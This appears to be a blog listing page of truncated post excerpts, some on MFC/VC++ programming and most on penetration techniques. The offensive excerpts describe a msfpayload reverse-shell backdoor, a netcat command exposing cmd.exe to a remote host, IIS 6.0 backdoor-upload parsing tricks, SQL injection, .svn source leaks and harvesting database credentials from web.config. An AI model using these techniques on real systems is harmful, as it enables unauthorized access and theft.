台部落ytuo1223

例子程序最終效果圖：一直在尋找製作一個 24bit 及以上真彩工具條的簡單有效方法，在各種VC站點都找到了很多有關這方面的文章和介紹，但是都存在一個不足的地方，介紹的不夠詳細，對初學者來說有點難度。最近終於有所發現，因此在這裏將自己

2020-02-21 11:12:11

本文主要介紹了 OpenSCManager、CreateService、OpenService、ControlService、DeleteService、 RegisterServiceCtrlHandler、SetServiceStat

2020-02-21 11:12:11

0x00 測試環境 centos6.5+apache2.2.15+php5.3.3 0x01 php的運行模式介紹 php的運行模式分四種： 1. CGI通用網關接口 2. fast-cgi常駐型的CGI 3. cli命令行運行

2018-09-04 00:10:48

0x01 reverse the shell File 通常做法是使用msfpayload生成一個backdoor.exe然後上傳到目標機器執行。本地監聽即可獲得meterpreter shell。 reverse_tcp/http/h

2018-09-04 00:10:48

0x01 尋找方式先說一般的數據庫連接信息。第一種一般在web.config，如某套OA就是將連接字符串存放在該文件內，如下圖：第二種有的ASP.NET程序功能較多，會自定義其它config文件，所以可能會存在多個config

2018-09-04 00:10:48

mysql在滲透中的技巧總結... 目錄： 0×00 mysql一般注入（select） 0×01 mysql一般注入（insert、update） 0×02 mysql報錯注入 0×03 mysql一般

2018-09-04 00:10:48

有的站點使用.svn來做生產環境版本控制，但是.svn目錄沒有做訪問權限限制，可以通過.svn/entries來遍歷文件和目錄列表。如果*.php.svn-base不被當.php來執行，那麼恭喜你，svn中的.php程序源碼隨你下了，分析

2018-09-04 00:10:47

域基本知識：有人說域是一種組織結構，是個安全邊界。域也有另爲一個名字，“活動目錄”。不管域是什麼，它總有一些特點，有了它，對管理一個機構的組織單元，人員，特別是計算機就方便了許多，特別是計算機，因爲域就是建立在計算機上的。加入域裏的計算

2018-09-04 00:10:47

0x00 什麼是觸發器觸發器（trigger）是數據庫提供給程序員和數據分析員來保證數據完整性的一種方法，它是與表事件相關的特殊的儲存過程，它的執行不是由程序調用，也不是手工啓動，而是由事件來觸發，當對一個表進行操作（insert，de

2018-09-04 00:10:47

本地Windows監聽 nc -vv -l -p 1234 遠程Windows轉發 nc -t -e C:\WINDOWS\system32\cmd.

2018-09-04 00:10:47

[+]IIS 6.0 目錄解析：/xx.asp/xx.jpg xx.jpg可替換爲任意文本文件(e.g. xx.txt)，文本內容爲後門代碼 IIS6.0 會將 xx.jpg 解析爲 asp 文件。後綴解析：/xx.asp;.jpg

2018-09-04 00:10:47

0x01 mongodb未授權訪問掃描服務器是否開啓了端口27017，使用客戶端直接連接客戶端下載 http://www.mongovue.com/downloads/ 0x02 mongdb的REST接口，提供一個we

2018-09-04 00:10:46

基本環境：服務器端：oracle11.2g X64 客戶端：Windows 8.1 X64 1 下載安裝oracle的精簡客戶端從oracle官網下載最新版intantclient，目前最新版是12.1。因爲oracle的客戶端是向下

2018-09-04 00:10:46

我來分享一個小技巧，Burp修改response欺騙小胖子 (VIP你快回來，園長欺負我！) | 2014-05-29 11:38 上次看到某同學在問，很多人都說用fiddler。在drops裏面的burp教程也是一筆帶過，沒有很好的

2018-09-04 00:10:46

首先，你需要一張適合自己對話框程序大小的bmp圖片作爲背景（這點很重要，否則就會有拉伸的現象），將這幅位圖導入到工程中，命名爲IDB_BACKGROUD。 1.在CtestDlg的OnPaint()函數中的else部分添加以下代碼： el

2018-09-04 00:10:31